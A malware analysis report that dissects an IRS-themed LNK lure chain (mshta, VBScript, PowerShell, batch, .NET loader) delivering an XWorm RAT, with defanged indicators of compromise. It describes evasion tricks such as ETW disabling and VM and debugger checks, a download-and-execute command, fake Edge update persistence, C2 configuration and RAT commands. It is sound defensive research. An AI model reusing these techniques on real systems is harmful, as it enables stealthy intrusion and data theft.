From IRS Files to XWorm: Dissecting a Multi‑Stage LNK‑Based Malware Chain
Feb 02, 2026
Executive Summary
This report details the analysis of a multi‑stage malware delivery campaign distributed via a ZIP archive shared on X by researcher Smica83. The archive, titled “Martin Robinson IRS Files”, contains five password‑protected PDFs and a deceptive shortcut file, passwords.txt.lnk, masquerading as a password document. The LNK file serves as the initial access vector and initiates execution when opened.
Rather than delivering a malicious executable, the LNK launches mshta.exe to retrieve a remote HTA payload, enabling the threat actor to bypass traditional attachment‑based defenses. Execution proceeds through a carefully staged chain involving HTA, VBScript, PowerShell, Batch, and .NET components, with each stage responsible for a discrete function. This modular design enables payload flexibility while complicating detection and analysis.
Heavy obfuscation is applied throughout all scripting stages using XOR operations, string manipulation, Base64 encoding, and AES encryption. Persistence is established early via a scheduled task masquerading as a legitimate Microsoft Edge update task, executing an obfuscated VBS file every three minutes. Persistence and loader logic are fully separated from the final payload, allowing the same framework to be reused with different malware families.
The loader DLL implements extensive anti‑analysis controls, including timing checks, virtual machine and sandbox detection, and identification of common debugging and reverse‑engineering tools. Only after these checks pass is the final payload decrypted, loaded, and executed.
The delivered malware is identified as an older Xworm variant (likely 3.x) based on decrypted configuration values, command structure, and the absence of newer features. The payload establishes AES‑encrypted C2 communication, exfiltrates detailed host profiling data (system, hardware, user context, and security products), and awaits encrypted commands from the C2 server. This Xworm variant does not implement its own persistence, relying entirely on the earlier loader stages.02
Overall, the campaign demonstrates disciplined tradecraft despite leveraging commodity malware. The use of layered execution, strong obfuscation, anti‑analysis measures, and legitimate‑looking persistence mechanisms indicates an emphasis on stealth and long‑term access rather than rapid exploitation. The IRS‑themed lure and U.S.‑specific terminology suggest primary targeting of U.S.‑based users, with potential spillover into other English‑speaking regions.
Infection Chain
Key Findings
The infection chain begins with a socially engineered LNK file disguised as a password document, which executes
mshta.exeto load a remote HTA payload, avoiding direct executable delivery.Multiple staged scripts (HTA, VBScript, PowerShell, Batch) are used to gradually deploy the final payload, indicating a deliberate multi-layered execution flow designed to evade detection and analysis.
Extensive obfuscation is present across all scripting stages, including XOR operations, string slicing, Base64 encoding, and AES encryption, significantly hindering static analysis.
The malware establishes persistence via a scheduled task masquerading as a legitimate Microsoft Edge update task, executing an obfuscated VBS file every three minutes.
Anti-analysis techniques are heavily employed in the loader stage, including timing checks, virtual machine detection, sandbox detection, and identification of common debugging and reverse engineering tools.
The final payload is identified as an older Xworm variant (likely 3.x), based on configuration strings and the absence of newer features.
Encrypted C2 communication is used to exfiltrate detailed host information, including hardware details, OS information, security products, and user context.
Persistence and execution logic are separated from the final payload, allowing the threat actor to reuse the same loader framework for different malware families.
The lure content and document naming (IRS tax forms, U.S.-specific terminology) suggest primary targeting of U.S.-based users, with potential spillover into other English-speaking regions.
Technical Analysis
The ZIP file contains five password-protected PDFs and a LNK file named passwords.txt.lnk, all disguised as tax return documents belonging to an individual named Martin Robinson.
Stage 0: Password.txt.lnk
The icon of the LNK file is set to SHELL32.dll. The LNK file is configured to execute mshta.exe with arguments pointing to a remote URL, indicating that the payload is an HTA document.
The site joggle.navelyandco.com redirects to https[:]//terazosine.fit/FZDHLARIUVANBDCXVZDG.
Inspecting the HTA file shows that it is executing embedded VBScript code.
Stage 1: Malicious VBScript
At the beginning of execution, the VBScript calls Window.ResizeTo 0,0 and Window.MoveTo -20000,-30000, ensuring the window is completely invisible to the user.
The VBScript is heavily obfuscated and includes multiple functions such as XOR operations, ASCII shifting, reverse XOR ciphers, and a configuration manager that handles global variables. Overall, the script is fairly well structured despite the obfuscation.
The VBScript dynamically constructs a PowerShell script through decoding, XOR operations, and string manipulation, and then executes it.
The generated PowerShell script runs with ExecutionPolicy Bypass and contains a Base64-encoded command. After decoding the Base64 content, the following behavior is observed:
The script creates a directory in the Temp folder, retrieves an additional PowerShell script from a remote URL using (iwr $url -UseBasicParsing).Content, saves it to the Temp directory, executes it, and then deletes both the script and the directory.
Stage 2: Malicious Powershell Script
This script first retrieves content from a remote site, creates a file named Password.txt in the Temp folder, writes the retrieved content into the file, and executes it.
Since the user initially opened passwords.txt.lnk, this serves as a decoy password file and displays the password Password2026 for the password-protected PDFs, which turns out to be incorrect.
This may indicate that the PDF files themselves are legitimate and not fabricated decoys, but the threat actor does not possess the correct password.
The script then sleeps for five seconds and initializes four different directory paths under locations such as ProgramData\OneAuth\Microsoft\PackagedEventProviders\DeliveryOptimization, which are designed to resemble legitimate Microsoft directories.
These folders are created if they do not already exist.
Next, a large hardcoded Base64-like string is written to the file
C:\ProgramData\DeliveryCurrentControlSet\SessionManager\Optimization\USOShared\IAKFSHHVEHGYMFUVJTVHEW.txt.
Two additional Base64-like strings are written to separate files in the same directory, each with different filenames.
The script then creates a batch file named 0976B5F2-D5BE-4F90-BFCD-0E096BC83244.bat inside the directory C:\ProgramData\Local\MicrosoftWindows.Client\Microsoft\MicrosoftWindows.Client\D4A80266-9D0A-41A4-A57C-954735A4EF36\BrowserCore\.
This batch script is mildly obfuscated. It first executes set COMPlus_ETWEnabled=0, disabling ETW, and then runs a PowerShell command that executes the script located at C:\ProgramData\OneAuth\Microsoft\PackagedEventProviders\DeliveryOptimization\088DA033-FAD4-423E-9983-A0137A0313E7\IdentityCRL\9F92ED07-CE61-4CB2-8897-F4914621A054.ps1.
Next, the script writes an obfuscated Visual Basic Script named 0976B5F2-D5BE-4F90-BFCD-0E096BC83244.vbs to the directory C:\ProgramData\PackageCache\Microsoft\INetCache\PackagedEventProviders\ABEFF09B-C516-4F6F-A5DF-0D7F53B52FC4\.
A scheduled task named MicrosoftEdgeUpdatesTaskMachineUA{15F6155B-AD12-4CD6-810D-46E77564809D} is then created to execute this VBS file every three minutes.
Finally, an obfuscated PowerShell script named 9F92ED07-CE61-4CB2-8897-F4914621A054.ps1 is written to C:\ProgramData\OneAuth\Microsoft\PackagedEventProviders\DeliveryOptimization\088DA033-FAD4-423E-9983-A0137A0313E7\IdentityCRL\, after which the script exits.
Stage 3: Malicious VBS Loader
The scheduled task executes this Visual Basic Script every three minutes. An initial inspection shows that the script is highly obfuscated, with little to no immediate readability. It contains long strings that are sliced and recombined to dynamically construct additional strings at runtime.
Toward the end of execution, the script uses GetObject(Parameter) followed by RetrievedObject.Get(Param).SpawnInstance_, suggesting process creation through WMI.
The ShowWindow parameter is set to 0 to hide the window. The script then calls .Create(Param1, null, Param2, intProcessID) to spawn a new process.
Further analysis confirms that the VBS script is responsible for executing the previously dropped batch file.
As observed earlier, the batch file’s sole purpose is to disable ETW and execute the PowerShell script written in the earlier stage.
Stage 3: Malicious Powershell Loader
This PowerShell script exhibits a similar obfuscation style to the Visual Basic Script.
Toward the end of the script, the use of New-Object along with parameters 256, 128, CBC, and PKCS7 clearly indicates AES decryption.
After partial deobfuscation, it becomes evident that the script decrypts a payload, loads it as an assembly, and executes it, confirming the payload is a .NET sample.
Further analysis reveals that the three text files written earlier contain fragments of the payload. These fragments are concatenated into a single blob, Base64-decoded, and AES-decrypted.
The final payload is a DLL, and the entry method executed is
PPAOMMAIKEGECWICJDLZGHCTJJKW.QMHQXYWOHIEWQJMFCHESCKXOLTNH.
Stage 4: Xworm Loader DLL
Initial triage indicates the DLL contains multiple anti-analysis mechanisms, including anti-debugging, anti-dnSpy, and anti-Sandboxie checks. A PDB file path is also present.
The malware creates a mutex named DGARPCRYLZILHXNSOOOIZJIWWZRD and calls a function in a loop where i ranges from 0 to 3, passing the value of i as a parameter during each invocation.
Each iteration performs different functionality.
The malware conducts several anti-analysis checks, including timing checks (sleep and time difference comparison), querying system manufacturer information via WMI (Win32_ComputerSystem) to detect strings such as vmware, virtual, or vbox, checking for SbieDll.dll, and scanning for analysis tools including dnSpy, OllyDbg, x32dbg, x64dbg, Binary Ninja, Immunity Debugger, and WinDbg.
If these checks pass, the malware proceeds to decrypt a hardcoded Base64-encoded blob using Rijndael, loads the decrypted assembly, and executes it.
Stage 5: Xworm Payload
Initial triage using Detect It Easy identifies the malware as Xworm (version range 3.0–5.0). This payload is not obfuscated, as the previous stages already ensured the environment was suitable for execution.
Analyzing the binary in dnSpy shows that it initially sleeps for a few seconds and then attempts to retrieve its configuration by AES-decrypting hardcoded values. If this process fails, execution terminates.
The decrypted configuration values are as follows:
Host:
"steinsgroup.org"Port:
"48384"KEY:
"L@sting@123"SPL:
"Xwormmm"Groub:
"Transitive"USBNM:
"USB.exe"
The SPL value Xwormmm indicates an older Xworm variant, likely from the 3.x family rather than more recent versions. This is further supported by the absence of keylogging or more advanced functionality typically seen in newer variants.
The malware then creates a mutex named oFomxvvHZ6rjKRXr and exits if mutex creation fails.
It calls PreventSleep, which uses SetThreadExecutionState to prevent the system from entering sleep mode.
After another short sleep, it creates a thread to initiate encrypted communication with the C2 server.
Upon successful connection, the malware AES-encrypts and sends system information to the C2 server, including:
ProcessorCount,UserName,MachineName,OSVersion,TotalSizeof System DriveUserName, OS name and service pack, Architecture (x86/x64)File last write timestamps
USB propagation status
Administrator privileges status
Camera Information via
capGetDriverDescriptionACPU Information via
Win32_Processor.deviceid="CPU0"GPU information via
Win32_VideoControllerTotal Physical Ram
Installed antivirus products via
root\SecurityCenter2
The malware then receives AES-encrypted commands from the C2 server and decrypts them for execution.
Below are the supported commands and its usage the malware includes:
rec
Restarts application
CLOSE
Close the application
uninstall
Write and execute a batch file to remove current process executable from start-up folder and close the application.
update
Execute uninstall command functions and start a new process with executable code from a C2 argument.
DW
Write and execute PowerShell content received as an argument from C2.
FM
Invokes the content of argument memory stream into the current process.
LN
Download file from argument URL and execute it.
Urlopen
Create GET request for argument URL and open it with browser.
Urlhide
Create GET request for argument URL and open it within existing process.
PCShutdown
Execute shutdown command “shutdown.exe /f /s /t 0”
PCRestart
Execute restart command “shutdown.exe /f /r /t 0”
PCLogoff
Execute logoff command “shutdown.exe -L”
RunShell
Executes a command in shell
StartDDos
Create thread to perform repeated POST request to the provided host and port. The function will repeat this action every few specified seconds until the specified time limit is reached. Host, port, and time limit are provided as arguments.
StopDDos
Stops DDos thread.
StartReport
Create thread to compare running processes title with provided list., If it matches, send message to C2.
StopReport
Stops StartReport thread.
Xchat
Live Interaction with the victim
Hosts
Sends all the content from the \drivers\etc\hosts
Shosts
Modify the content of etc\hosts
DDos
Resend “DDos” message to C2.
plugin
Sends all of the plugin names stored in the registry
savePlugin
Saves the plugin after base64 decoding and decompressing
RemovePlugins
Removes the plugin from registry
OfflineGet
Usually for offline keylogging but in our case it sends the error message "OfflineKeylogger Not Enabled" to c2 server.
$Cap
Takes screenshot and sends it to C2 as memory stream.
This version of XWorm does not implement its own persistence mechanism, as persistence was already established earlier by the threat actor.
IOC
Password.txt.lnk
60596b7090f70f41c94f6660a9f64c5e606eae403705debe86f4bc5d9d6ab67c
2024 Tax Return Documents (MARTIN ROBINSON)-protected.pdf
76f0895587a5c6197296fcaab6362f92e433bc07b46b867030a0cb9cd1ee4af8
2024 Wks FDST AGI-protected.pdf
112a45c1b615ec69107cb631029d0cb82c4436f4a68e2316a7c2dcf7641b575e
CamScanner 02-03-2025 09.25-protected.pdf
d95e413e59052c9d9d3d591089da6021c05e7578d7e70faa260e1bc62013f85f
Form 843-protected.pdf
1e98db5874724feb356581e59b512a065046607d645aaf34b379e687f0453a58
Form 2848 M Robinson-protected.pdf
cc9f4f27543747d727e218566874ce268a58bfc046b20df53edd92cdb4cfd5f1
Malicious HTA Download URL(Redirector)
http[:]//joggle.navelyandco.com
Malicious HTA Download URL
https[:]//terazosine.fit/FZDHLARIUVANBDCXVZDG
Malicious HTA File
1770d29ee22567d5cdd82f6a187a7768202ae86778f01cd46326dad82c673c27
Malicious Powershell Script Download URL
https[]:]//terazosine.fit/KAGBLCPMDJUJHWZKFKNG
Malicious Powershell Script
e97e36aef906b1458c545cf3480e18f51bf79697c8c52aab859d263813057cac
Encrypted Payload Fragment File
1d92c9cb5e3dfd50b9a2283dd96816d4df6a97e5eba42b3badd8ce41a4d40668
Encrypted Payload Fragment File
3cfbd2557eef20e2b1302f146a6d951f274db07138f2fabd055c7800ab48aaa9
Encrypted Payload Fragment File
4cc1a95b41a297ca2c68e6ee6811e991508ce4e4c43891116d2838b49c12d24b
Malicious Batch File
d5c01bda43e2eff9b6bea1f572fe912d5822da00b1e419c6dae1997edd0802db
Malicious VBS Loader
f52a994bc0df2b8e7d381a2f2f81cfe3d4ae7453dc66b94f4c23a6f8f2506a6d
Malicious Powershell Loader
b9d3848d39e24af3feef53b9cce4201c7503da827bd663c51a94766d75caeabb
Xworm Loader
5dfc407c36076b543c59321ac9d1971a3b53161e356313fd14a0be04d297d3a4
Xworm Final Payload
611233a9712152e0e7b234351327811e52c0619bea1137bd99255143f28ebb61
C2 Domain
steinsgroup.org
C2 Server IP & Port
185.208.159.115[:]48384
Decoy Password URL
https[:]//terazosine.fit/NNJMVHMXVKOFQJYYOHGF
Last updated